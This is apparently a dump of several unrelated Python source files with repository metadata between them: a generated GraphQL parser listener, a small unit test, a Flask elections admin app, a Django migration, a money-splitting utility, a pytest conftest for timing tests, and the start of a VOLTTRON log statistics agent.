GraphQLParser#rootOperationTypeDefinition. def exitRootOperationTypeDefinition(self, ctx:GraphQLParser.RootOperationTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#schemaExtension. def enterSchemaExtension(self, ctx:GraphQLParser.SchemaExtensionContext): pass # Exit a parse tree produced by GraphQLParser#schemaExtension. def exitSchemaExtension(self, ctx:GraphQLParser.SchemaExtensionContext): pass # Enter a parse tree produced by GraphQLParser#operationTypeDefinition. def enterOperationTypeDefinition(self, ctx:GraphQLParser.OperationTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#operationTypeDefinition. def exitOperationTypeDefinition(self, ctx:GraphQLParser.OperationTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#description. def enterDescription(self, ctx:GraphQLParser.DescriptionContext): pass # Exit a parse tree produced by GraphQLParser#description. def exitDescription(self, ctx:GraphQLParser.DescriptionContext): pass # Enter a parse tree produced by GraphQLParser#typeDefinition. def enterTypeDefinition(self, ctx:GraphQLParser.TypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#typeDefinition. def exitTypeDefinition(self, ctx:GraphQLParser.TypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#typeExtension. def enterTypeExtension(self, ctx:GraphQLParser.TypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#typeExtension. def exitTypeExtension(self, ctx:GraphQLParser.TypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#scalarTypeDefinition. def enterScalarTypeDefinition(self, ctx:GraphQLParser.ScalarTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#scalarTypeDefinition. def exitScalarTypeDefinition(self, ctx:GraphQLParser.ScalarTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#scalarTypeExtension. def enterScalarTypeExtension(self, ctx:GraphQLParser.ScalarTypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#scalarTypeExtension. def exitScalarTypeExtension(self, ctx:GraphQLParser.ScalarTypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#objectTypeDefinition. def enterObjectTypeDefinition(self, ctx:GraphQLParser.ObjectTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#objectTypeDefinition. def exitObjectTypeDefinition(self, ctx:GraphQLParser.ObjectTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#implementsInterfaces. def enterImplementsInterfaces(self, ctx:GraphQLParser.ImplementsInterfacesContext): pass # Exit a parse tree produced by GraphQLParser#implementsInterfaces. def exitImplementsInterfaces(self, ctx:GraphQLParser.ImplementsInterfacesContext): pass # Enter a parse tree produced by GraphQLParser#fieldsDefinition. def enterFieldsDefinition(self, ctx:GraphQLParser.FieldsDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#fieldsDefinition. def exitFieldsDefinition(self, ctx:GraphQLParser.FieldsDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#fieldDefinition. def enterFieldDefinition(self, ctx:GraphQLParser.FieldDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#fieldDefinition. def exitFieldDefinition(self, ctx:GraphQLParser.FieldDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#argumentsDefinition. def enterArgumentsDefinition(self, ctx:GraphQLParser.ArgumentsDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#argumentsDefinition. def exitArgumentsDefinition(self, ctx:GraphQLParser.ArgumentsDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#inputValueDefinition. def enterInputValueDefinition(self, ctx:GraphQLParser.InputValueDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#inputValueDefinition. def exitInputValueDefinition(self, ctx:GraphQLParser.InputValueDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#objectTypeExtension. def enterObjectTypeExtension(self, ctx:GraphQLParser.ObjectTypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#objectTypeExtension. def exitObjectTypeExtension(self, ctx:GraphQLParser.ObjectTypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#interfaceTypeDefinition. def enterInterfaceTypeDefinition(self, ctx:GraphQLParser.InterfaceTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#interfaceTypeDefinition. def exitInterfaceTypeDefinition(self, ctx:GraphQLParser.InterfaceTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#interfaceTypeExtension. def enterInterfaceTypeExtension(self, ctx:GraphQLParser.InterfaceTypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#interfaceTypeExtension. def exitInterfaceTypeExtension(self, ctx:GraphQLParser.InterfaceTypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#unionTypeDefinition. def enterUnionTypeDefinition(self, ctx:GraphQLParser.UnionTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#unionTypeDefinition. def exitUnionTypeDefinition(self, ctx:GraphQLParser.UnionTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#unionMemberTypes. def enterUnionMemberTypes(self, ctx:GraphQLParser.UnionMemberTypesContext): pass # Exit a parse tree produced by GraphQLParser#unionMemberTypes. def exitUnionMemberTypes(self, ctx:GraphQLParser.UnionMemberTypesContext): pass # Enter a parse tree produced by GraphQLParser#unionTypeExtension. def enterUnionTypeExtension(self, ctx:GraphQLParser.UnionTypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#unionTypeExtension. def exitUnionTypeExtension(self, ctx:GraphQLParser.UnionTypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#enumTypeDefinition. def enterEnumTypeDefinition(self, ctx:GraphQLParser.EnumTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#enumTypeDefinition. def exitEnumTypeDefinition(self, ctx:GraphQLParser.EnumTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#enumValuesDefinition. def enterEnumValuesDefinition(self, ctx:GraphQLParser.EnumValuesDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#enumValuesDefinition. def exitEnumValuesDefinition(self, ctx:GraphQLParser.EnumValuesDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#enumValueDefinition. def enterEnumValueDefinition(self, ctx:GraphQLParser.EnumValueDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#enumValueDefinition. def exitEnumValueDefinition(self, ctx:GraphQLParser.EnumValueDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#enumTypeExtension. def enterEnumTypeExtension(self, ctx:GraphQLParser.EnumTypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#enumTypeExtension. def exitEnumTypeExtension(self, ctx:GraphQLParser.EnumTypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#inputObjectTypeDefinition. def enterInputObjectTypeDefinition(self, ctx:GraphQLParser.InputObjectTypeDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#inputObjectTypeDefinition. def exitInputObjectTypeDefinition(self, ctx:GraphQLParser.InputObjectTypeDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#inputFieldsDefinition. def enterInputFieldsDefinition(self, ctx:GraphQLParser.InputFieldsDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#inputFieldsDefinition. def exitInputFieldsDefinition(self, ctx:GraphQLParser.InputFieldsDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#inputObjectTypeExtension. def enterInputObjectTypeExtension(self, ctx:GraphQLParser.InputObjectTypeExtensionContext): pass # Exit a parse tree produced by GraphQLParser#inputObjectTypeExtension. def exitInputObjectTypeExtension(self, ctx:GraphQLParser.InputObjectTypeExtensionContext): pass # Enter a parse tree produced by GraphQLParser#directiveDefinition. def enterDirectiveDefinition(self, ctx:GraphQLParser.DirectiveDefinitionContext): pass # Exit a parse tree produced by GraphQLParser#directiveDefinition. def exitDirectiveDefinition(self, ctx:GraphQLParser.DirectiveDefinitionContext): pass # Enter a parse tree produced by GraphQLParser#directiveLocations. def enterDirectiveLocations(self, ctx:GraphQLParser.DirectiveLocationsContext): pass # Exit a parse tree produced by GraphQLParser#directiveLocations. def exitDirectiveLocations(self, ctx:GraphQLParser.DirectiveLocationsContext): pass # Enter a parse tree produced by GraphQLParser#directiveLocation. def enterDirectiveLocation(self, ctx:GraphQLParser.DirectiveLocationContext): pass # Exit a parse tree produced by GraphQLParser#directiveLocation. def exitDirectiveLocation(self, ctx:GraphQLParser.DirectiveLocationContext): pass # Enter a parse tree produced by GraphQLParser#executableDirectiveLocation. def enterExecutableDirectiveLocation(self, ctx:GraphQLParser.ExecutableDirectiveLocationContext): pass # Exit a parse tree produced by GraphQLParser#executableDirectiveLocation. def exitExecutableDirectiveLocation(self, ctx:GraphQLParser.ExecutableDirectiveLocationContext): pass # Enter a parse tree produced by GraphQLParser#typeSystemDirectiveLocation. def enterTypeSystemDirectiveLocation(self, ctx:GraphQLParser.TypeSystemDirectiveLocationContext): pass # Exit a parse tree produced by GraphQLParser#typeSystemDirectiveLocation. def exitTypeSystemDirectiveLocation(self, ctx:GraphQLParser.TypeSystemDirectiveLocationContext): pass # Enter a parse tree produced by GraphQLParser#name. def enterName(self, ctx:GraphQLParser.NameContext): pass # Exit a parse tree produced by GraphQLParser#name. def exitName(self, ctx:GraphQLParser.NameContext): pass del GraphQLParser
35.299539
101
0.758964
a914383576c54aa31117d4d8b56250d201d6b25c
355
py
Python
tests/test_meshinery.py
drozdziak1/meshinery
65d3e1eba071ddf4b803909e9d42ef61c4de22c1
[ "MIT" ]
null
null
null
tests/test_meshinery.py
drozdziak1/meshinery
65d3e1eba071ddf4b803909e9d42ef61c4de22c1
[ "MIT" ]
null
null
null
tests/test_meshinery.py
drozdziak1/meshinery
65d3e1eba071ddf4b803909e9d42ef61c4de22c1
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- """ test_meshinery ---------------------------------- Tests for `meshinery` module. """ import unittest import meshinery class TestMeshinery(unittest.TestCase): def setUp(self): pass def test_something(self): assert(meshinery.__version__) def tearDown(self): pass
13.653846
39
0.583099
f80741a074820c036344c63bfcaa99ae45e9d2a4
5,571
py
Python
admin_app.py
nprapps/elections14
b89f65aa276eebb790594f456d58e741066c1f93
[ "MIT" ]
5
2015-01-23T19:23:21.000Z
2015-05-01T17:15:13.000Z
admin_app.py
nprapps/elections14
b89f65aa276eebb790594f456d58e741066c1f93
[ "MIT" ]
1
2015-02-04T18:58:40.000Z
2015-02-04T18:58:40.000Z
admin_app.py
nprapps/elections14
b89f65aa276eebb790594f456d58e741066c1f93
[ "MIT" ]
1
2021-02-23T10:25:25.000Z
2021-02-23T10:25:25.000Z
#!/usr/bin/env python import argparse import datetime import json import logging import subprocess import boto from boto.s3.key import Key from fabfile import stack from flask import Flask, render_template from flask_peewee.auth import Auth from flask_peewee.db import Database from flask_peewee.admin import Admin, ModelAdmin from models import Slide, SlideSequence, Race, Candidate from peewee import fn import app_config from render_utils import make_context, urlencode_filter, smarty_filter import static_app app = Flask(__name__) app.config['PROPAGATE_EXCEPTIONS'] = True app.config['DATABASE'] = app_config.DATABASE app.config['SECRET_KEY'] = 'askfhj3r3j' app.jinja_env.filters['urlencode'] = urlencode_filter app.jinja_env.filters['smarty'] = smarty_filter app.register_blueprint(static_app.static_app, url_prefix='/%s' % app_config.PROJECT_SLUG) file_handler = logging.FileHandler('%s/app.log' % app_config.SERVER_LOG_PATH) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) class SlideAdmin(ModelAdmin): exclude = ('slug',) # Set up flask peewee db wrapper db = Database(app) auth = Auth(app, db, prefix='/%s/accounts' % app_config.PROJECT_SLUG) admin = Admin(app, auth, prefix='/%s/admin' % app_config.PROJECT_SLUG) admin.register(Slide, SlideAdmin) admin.register(SlideSequence) admin.setup() @app.route('/%s/admin/stack/' % app_config.PROJECT_SLUG, methods=['GET']) def _stack(): """ Administer a stack of slides. """ context = make_context(asset_depth=1) sequence = SlideSequence.select() sequence_dicts = sequence.dicts() time = 0 for slide in sequence: time += slide.slide.time_on_screen for slide_dict in sequence_dicts: for slide in sequence: if slide.slide.slug == slide_dict['slide']: slide_dict['name'] = slide.slide.name slide_dict['time_on_screen'] = slide.slide.time_on_screen if slide_dict['slide'].startswith('tumblr'): slide_dict['news_item'] = True context.update({ 'sequence': sequence_dicts, 'slides': Slide.select().dicts(), 'graphics': Slide.select().where(fn.Lower(fn.Substr(Slide.slug, 1, 6)) != 'tumblr').order_by(Slide.slug).dicts(), 'news': Slide.select().where(fn.Lower(fn.Substr(Slide.slug, 1, 6)) == 'tumblr').order_by(Slide.slug.desc()).dicts(), 'time': time, }) return render_template('admin/stack.html', **context) @app.route('/%s/admin/stack/save' % app_config.PROJECT_SLUG, methods=['POST']) def save_stack(): """ Save new stack sequence. """ from flask import request data = request.json SlideSequence.delete().execute() # Rebuild sequence table for i, row in enumerate(data[0]): SlideSequence.create(order=i, slide=row['slide']) stack.deploy() return "Saved sequence" @app.route('/%s/admin/chamber/<chamber>/' % app_config.PROJECT_SLUG, methods=['GET']) def chamber(chamber): """ Read/update list of chamber candidates. """ chamber_slug = 'H' if chamber == 'senate': chamber_slug = 'S' elif chamber == 'governor': chamber_slug = 'G' races = Race.select().where(Race.office_id == chamber_slug).order_by(Race.state_postal, Race.seat_number) context = make_context(asset_depth=1) context.update({ 'races': races, 'chamber': chamber, }) return render_template('admin/chamber.html', **context) @app.route('/%s/admin/chamber/<chamber>/call/' % app_config.PROJECT_SLUG, methods=['POST']) def chamber_call(chamber): from flask import request race_slug = request.form.get('race_slug', None) race = Race.get(Race.slug == race_slug) # Toggling accept AP call accept_ap_call = request.form.get('accept_ap_call', None) if accept_ap_call != None: if accept_ap_call.lower() == 'true': accept_ap_call = True else: accept_ap_call = False if race_slug != None and accept_ap_call != None: race.accept_ap_call = accept_ap_call race.save() if accept_ap_call == True: Candidate.update(npr_winner=False).where(Candidate.race == race).execute() # Setting NPR winner first_name = request.form.get('first_name', None) last_name = request.form.get('last_name', None) clear_all = request.form.get('clear_all', None) if race_slug != None and clear_all != None: if clear_all == 'true': Candidate.update(npr_winner=False).where(Candidate.race == race).execute() race.npr_called = False race.save() if race_slug != None and first_name != None and last_name != None: Candidate.update(npr_winner=False).where(Candidate.race == race).execute() Candidate.update(npr_winner=True).where( Candidate.race == race, Candidate.first_name == first_name, Candidate.last_name == last_name ).execute() race.npr_called = True if race.accept_ap_call == False: if race.npr_called_time == None: race.npr_called_time = datetime.datetime.utcnow() race.save() return 'Success' # Boilerplate if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-p', '--port') args = parser.parse_args() server_port = 8080 if args.port: server_port = int(args.port) app.run(host='0.0.0.0', port=server_port, debug=app_config.DEBUG)
29.321053
125
0.666846
76cd569bad8ab91584a795c6a542aba65b1ac9a2
1,775
py
Python
core/migrations/0002_auto_20190606_0041.py
MubongwoNdasi/pms
0cc5dcbc25b31e13631672e1a03c88e2ad46bc92
[ "MIT" ]
null
null
null
core/migrations/0002_auto_20190606_0041.py
MubongwoNdasi/pms
0cc5dcbc25b31e13631672e1a03c88e2ad46bc92
[ "MIT" ]
8
2021-03-18T22:27:44.000Z
2022-02-10T09:18:50.000Z
core/migrations/0002_auto_20190606_0041.py
MubongwoNdasi/pms
0cc5dcbc25b31e13631672e1a03c88e2ad46bc92
[ "MIT" ]
1
2021-09-20T06:37:41.000Z
2021-09-20T06:37:41.000Z
# Generated by Django 2.2 on 2019-06-06 00:41 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('core', '0001_initial'), ] operations = [ migrations.AddField( model_name='city', name='created_on', field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'), preserve_default=False, ), migrations.AddField( model_name='city', name='updated_on', field=models.DateTimeField(auto_now=True, verbose_name='updated on'), ), migrations.AddField( model_name='pharmacy', name='created_on', field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'), preserve_default=False, ), migrations.AddField( model_name='pharmacy', name='updated_on', field=models.DateTimeField(auto_now=True, verbose_name='updated on'), ), migrations.AddField( model_name='pharmacyuser', name='updated_on', field=models.DateTimeField(auto_now=True, verbose_name='updated on'), ), migrations.AddField( model_name='profile', name='created_on', field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'), preserve_default=False, ), migrations.AddField( model_name='profile', name='updated_on', field=models.DateTimeField(auto_now=True, verbose_name='updated on'), ), ]
33.490566
118
0.59831
8cb365ec060514af9641d7684391a9a21a75c0d6
2,089
py
Python
hordak/utilities/money.py
PetrDlouhy/django-hordak
71c141928c5a2cc102bcfd710d7bdf17093933c9
[ "MIT" ]
2
2016-09-05T08:58:53.000Z
2016-09-26T10:49:07.000Z
hordak/utilities/money.py
PetrDlouhy/django-hordak
71c141928c5a2cc102bcfd710d7bdf17093933c9
[ "MIT" ]
3
2016-11-06T13:14:29.000Z
2016-11-06T13:57:58.000Z
hordak/utilities/money.py
waldocollective/django-hordak
dc9b8e5008954ca0f4b089d89348e7dec4301f65
[ "MIT" ]
null
null
null
from decimal import Decimal from hordak.defaults import DECIMAL_PLACES def ratio_split(amount, ratios): """Split in_value according to the ratios specified in `ratios` This is special in that it ensures the returned values always sum to in_value (i.e. we avoid losses or gains due to rounding errors). As a result, this method returns a list of `Decimal` values with length equal to that of `ratios`. Examples: .. code-block:: python >>> from hordak.utilities.money import ratio_split >>> from decimal import Decimal >>> ratio_split(Decimal('10'), [Decimal('1'), Decimal('2')]) [Decimal('3.33'), Decimal('6.67')] Note the returned values sum to the original input of ``10``. If we were to do this calculation in a naive fashion then the returned values would likely be ``3.33`` and ``6.66``, which would sum to ``9.99``, thereby loosing ``0.01``. Args: amount (Decimal): The amount to be split ratios (list[Decimal]): The ratios that will determine the split Returns: list(Decimal) """ precision = Decimal(10) ** Decimal(-DECIMAL_PLACES) assert amount == amount.quantize(precision) # Distribute the amount according to the ratios: ratio_total = sum(ratios) values = [amount * ratio / ratio_total for ratio in ratios] # Now round the values to the desired number of decimal places: rounded = [v.quantize(precision) for v in values] # The rounded values may not add up to the exact amount. # Use the Largest Remainder algorithm to distribute the # difference between participants with non-zero ratios: participants = [i for i in range(len(ratios)) if ratios[i] != Decimal(0)] for p in sorted(participants, key=lambda i: rounded[i] - values[i]): total = sum(rounded) if total < amount: rounded[p] += precision elif total > amount: rounded[p] -= precision else: break assert sum(rounded) == amount return rounded
34.245902
84
0.646721
086d6848084d97850897bbe6d6c6676fd8676882
13,044
py
Python
tests/time_tests/test_runner/conftest.py
maksimvlasov/openvino
be8600af38dd6ab39422b3db496c0fb73c156938
[ "Apache-2.0" ]
1
2021-07-14T07:20:24.000Z
2021-07-14T07:20:24.000Z
tests/time_tests/test_runner/conftest.py
maksimvlasov/openvino
be8600af38dd6ab39422b3db496c0fb73c156938
[ "Apache-2.0" ]
35
2020-11-13T16:32:58.000Z
2022-03-12T15:05:16.000Z
tests/time_tests/test_runner/conftest.py
sungeunk/openvino
c55291d62fced468570d15594738a7db6ef31c9d
[ "Apache-2.0" ]
1
2021-01-21T12:09:13.000Z
2021-01-21T12:09:13.000Z
# Copyright (C) 2018-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 # """ Basic high-level plugin file for pytest. See [Writing plugins](https://docs.pytest.org/en/latest/writing_plugins.html) for more information. This plugin adds the following command-line options: * `--test_conf` - Path to test configuration file. Used to parametrize tests. Format: YAML file. * `--exe` - Path to a timetest binary to execute. * `--niter` - Number of times to run executable. """ import hashlib import json import logging # pylint:disable=import-error import os import shutil import sys import tempfile from pathlib import Path import pytest import yaml from jsonschema import validate, ValidationError # add utils folder to imports UTILS_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), "utils") sys.path.insert(0, str(UTILS_DIR)) from path_utils import check_positive_int from platform_utils import get_os_name, get_os_version, get_cpu_info from utils import upload_data, metadata_from_manifest, DB_COLLECTIONS # -------------------- CLI options -------------------- def pytest_addoption(parser): """Specify command-line options for all plugins""" test_args_parser = parser.getgroup("timetest test run") test_args_parser.addoption( "--test_conf", type=Path, help="path to a test config", default=Path(__file__).parent / "test_config.yml" ) test_args_parser.addoption( "--exe", required=True, dest="executable", type=Path, help="path to a timetest binary to execute" ) test_args_parser.addoption( "--niter", type=check_positive_int, help="number of iterations to run executable and aggregate results", default=3 ) db_args_parser = parser.getgroup("timetest database use") db_args_parser.addoption( '--db_submit', metavar="RUN_ID", type=str, help='submit results to the database. ' \ '`RUN_ID` should be a string uniquely identifying the run' \ ' (like Jenkins URL or time)' ) is_db_used = db_args_parser.parser.parse_known_args(sys.argv).db_submit db_args_parser.addoption( '--db_url', type=str, required=is_db_used, help='MongoDB URL in a form "mongodb://server:port"' ) db_args_parser.addoption( '--db_collection', type=str, required=is_db_used, help='collection name in database', choices=DB_COLLECTIONS ) db_args_parser.addoption( '--db_metadata', type=str, default=None, help='path to JSON-formatted file to extract additional information') db_args_parser.addoption( '--manifest', type=Path, required=is_db_used, help='path to build manifest to extract commit information') @pytest.fixture(scope="session") def test_conf(request): """Fixture function for command-line option.""" return request.config.getoption('test_conf') @pytest.fixture(scope="session") def executable(request): """Fixture function for command-line option.""" return request.config.getoption('executable') @pytest.fixture(scope="session") def niter(request): """Fixture function for command-line option.""" return request.config.getoption('niter') # -------------------- CLI options -------------------- @pytest.fixture(scope="function") def temp_dir(pytestconfig): """Create temporary directory for test purposes. It will be cleaned up after every test run. """ temp_dir = tempfile.TemporaryDirectory() yield Path(temp_dir.name) temp_dir.cleanup() @pytest.fixture(scope="function") def cl_cache_dir(pytestconfig, instance): """Generate directory to save OpenCL cache before test run and clean up after run. Folder `cl_cache` should be created in a directory where tests were run. In this case cache will be saved correctly. This behaviour is OS independent. More: https://github.com/intel/compute-runtime/blob/master/opencl/doc/FAQ.md#how-can-cl_cache-be-enabled """ if instance["device"]["name"] == "GPU": cl_cache_dir = pytestconfig.invocation_dir / "cl_cache" # if cl_cache generation to a local `cl_cache` folder doesn't work, specify # `cl_cache_dir` environment variable in an attempt to fix it (Linux specific) os.environ["cl_cache_dir"] = str(cl_cache_dir) if cl_cache_dir.exists(): shutil.rmtree(cl_cache_dir) cl_cache_dir.mkdir() logging.info("cl_cache will be created in {}".format(cl_cache_dir)) yield cl_cache_dir shutil.rmtree(cl_cache_dir) else: yield None @pytest.fixture(scope="function") def model_cache_dir(pytestconfig, instance): """ Generate directory to IE model cache before test run and clean up after run. """ if instance.get("use_model_cache"): model_cache_dir = pytestconfig.invocation_dir / "models_cache" if model_cache_dir.exists(): shutil.rmtree(model_cache_dir) model_cache_dir.mkdir() logging.info("model_cache will be created in {}".format(model_cache_dir)) yield model_cache_dir shutil.rmtree(model_cache_dir) else: yield None @pytest.fixture(scope="function") def test_info(request, pytestconfig): """Fixture for collecting timetests information. Current fixture fills in `request` and `pytestconfig` global fixtures with timetests information which will be used for internal purposes. """ setattr(request.node._request, "test_info", {"results": {}, "raw_results": {}, "db_info": {}}) yield request.node._request.test_info @pytest.fixture(scope="function") def validate_test_case(request, test_info): """Fixture for validating test case on correctness. Fixture checks current test case contains all fields required for a correct work. """ schema = """ { "type": "object", "properties": { "device": { "type": "object", "properties": { "name": {"type": "string"} }, "required": ["name"] }, "model": { "type": "object", "properties": { "path": {"type": "string"} }, "required": ["path"] } }, "required": ["device", "model"], "additionalProperties": true } """ schema = json.loads(schema) try: validate(instance=request.node.funcargs["instance"], schema=schema) except ValidationError: request.config.option.db_submit = False raise yield @pytest.fixture(scope="function") def prepare_db_info(request, test_info, executable, niter, manifest_metadata): """Fixture for preparing and validating data to submit to a database. Fixture prepares data and metadata to submit to a database. One of the steps is parsing of build information from build manifest. After preparation, it checks if data contains required properties. """ FIELDS_FOR_ID = ['run_id', 'timetest', 'model', 'device', 'niter'] run_id = request.config.getoption("db_submit") if not run_id: yield return # add db_metadata db_meta_path = request.config.getoption("db_metadata") if db_meta_path: with open(db_meta_path, "r") as db_meta_f: test_info["db_info"].update(json.load(db_meta_f)) # add test info info = { # results will be added immediately before uploading to DB in `pytest_runtest_makereport` "run_id": run_id, "timetest": str(executable.stem), "model": request.node.funcargs["instance"]["model"], "device": request.node.funcargs["instance"]["device"], "niter": niter, "test_name": request.node.name, "os": "_".join([str(item) for item in [get_os_name(), *get_os_version()]]) } info['_id'] = hashlib.sha256( ''.join([str(info[key]) for key in FIELDS_FOR_ID]).encode()).hexdigest() test_info["db_info"].update(info) # add manifest metadata test_info["db_info"].update(manifest_metadata) # validate db_info schema = """ { "type": "object", "properties": { "device": { "type": "object", "properties": { "name": {"type": "string"} }, "required": ["name"] }, "model": { "type": "object", "properties": { "path": {"type": "string"}, "name": {"type": "string"}, "precision": {"type": "string"}, "framework": {"type": "string"} }, "required": ["path", "name", "precision", "framework"] }, "run_id": {"type": "string"}, "timetest": {"type": "string"}, "niter": {"type": "integer"}, "test_name": {"type": "string"}, "results": {"type": "object"}, "os": {"type": "string"}, "_id": {"type": "string"} }, "required": ["device", "model", "run_id", "timetest", "niter", "test_name", "os", "_id"], "additionalProperties": true } """ schema = json.loads(schema) try: validate(instance=test_info["db_info"], schema=schema) except ValidationError: request.config.option.db_submit = False raise yield @pytest.fixture(scope="session", autouse=True) def manifest_metadata(request): """Fixture function for command-line option.""" run_id = request.config.getoption("db_submit") if not run_id: yield return manifest_meta = metadata_from_manifest(request.config.getoption("manifest")) schema = """ { "type": "object", "properties": { "product_type": {"enum": ["private_linux_ubuntu_18_04", "private_windows_vs2019"]}, "repo_url": {"type": "string"}, "commit_sha": {"type": "string"}, "commit_date": {"type": "string"}, "branch": {"type": "string"}, "target_branch": {"type": "string"}, "version": {"type": "string"} }, "required": ["product_type", "repo_url", "commit_sha", "commit_date", "branch", "target_branch", "version"], "additionalProperties": false } """ schema = json.loads(schema) try: validate(instance=manifest_meta, schema=schema) except ValidationError: request.config.option.db_submit = False raise yield manifest_meta def pytest_generate_tests(metafunc): """Pytest hook for test generation. Generate parameterized tests from discovered modules and test config parameters. """ with open(metafunc.config.getoption('test_conf'), "r") as file: test_cases = yaml.safe_load(file) if test_cases: metafunc.parametrize("instance", test_cases) def pytest_make_parametrize_id(config, val, argname): """Pytest hook for user-friendly test name representation""" def get_dict_values(d): """Unwrap dictionary to get all values of nested dictionaries""" if isinstance(d, dict): for v in d.values(): yield from get_dict_values(v) else: yield d keys = ["device", "model"] values = {key: val[key] for key in keys} values = list(get_dict_values(values)) return "-".join(["_".join([key, str(val)]) for key, val in zip(keys, values)]) @pytest.mark.hookwrapper def pytest_runtest_makereport(item, call): """Pytest hook for report preparation. Submit tests' data to a database. """ run_id = item.config.getoption("db_submit") if not run_id: yield return data = item._request.test_info["db_info"].copy() data["results"] = item._request.test_info["results"].copy() data["raw_results"] = item._request.test_info["raw_results"].copy() data["cpu_info"] = get_cpu_info() data["status"] = "not_finished" data["error_msg"] = "" report = (yield).get_result() if call.when in ["setup", "call"]: if call.when == "call": if not report.passed: data["status"] = "failed" data["error_msg"] = report.longrepr.reprcrash.message else: data["status"] = "passed" db_url = item.config.getoption("db_url") db_collection = item.config.getoption("db_collection") logging.info("Upload data to {}/{}.{}. Data: {}".format(db_url, 'timetests', db_collection, data)) upload_data(data, db_url, 'timetests', db_collection)
32.773869
120
0.605259
71e45913a166035d9487fd3d45450c75b60c96ae
6,753
py
Python
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
cloudcomputingabc/volttron
6495e26e3185a7af8d0d79ad2586bdf8ea83992d
[ "Apache-2.0", "BSD-2-Clause" ]
406
2015-01-20T03:08:53.000Z
2022-03-31T20:59:07.000Z
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
cloudcomputingabc/volttron
6495e26e3185a7af8d0d79ad2586bdf8ea83992d
[ "Apache-2.0", "BSD-2-Clause" ]
2,031
2015-01-05T21:35:45.000Z
2022-03-29T21:44:36.000Z
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
cloudcomputingabc/volttron
6495e26e3185a7af8d0d79ad2586bdf8ea83992d
[ "Apache-2.0", "BSD-2-Clause" ]
219
2015-01-20T14:53:57.000Z
2022-03-06T00:37:41.000Z
# -*- coding: utf-8 -*- {{{ # vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et: # # Copyright 2020, Battelle Memorial Institute. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # This material was prepared as an account of work sponsored by an agency of # the United States Government. Neither the United States Government nor the # United States Department of Energy, nor Battelle, nor any of their # employees, nor any jurisdiction or organization that has cooperated in the # development of these materials, makes any warranty, express or # implied, or assumes any legal liability or responsibility for the accuracy, # completeness, or usefulness or any information, apparatus, product, # software, or process disclosed, or represents that its use would not infringe # privately owned rights. Reference herein to any specific commercial product, # process, or service by trade name, trademark, manufacturer, or otherwise # does not necessarily constitute or imply its endorsement, recommendation, or # favoring by the United States Government or any agency thereof, or # Battelle Memorial Institute. The views and opinions of authors expressed # herein do not necessarily state or reflect those of the # United States Government or any agency thereof. # # PACIFIC NORTHWEST NATIONAL LABORATORY operated by # BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY # under Contract DE-AC05-76RL01830 # }}} import datetime import logging import os import sys import statistics from volttron.platform.vip.agent import Agent, RPC, Core from volttron.platform.agent import utils from volttron.platform.agent.utils import get_aware_utc_now utils.setup_logging() _log = logging.getLogger(__name__) __version__ = '1.0' def log_statistics(config_path, **kwargs): """ Load the LogStatisticsAgent agent configuration and returns and instance of the agent created using that configuration. :param config_path: Path to a configuration file. 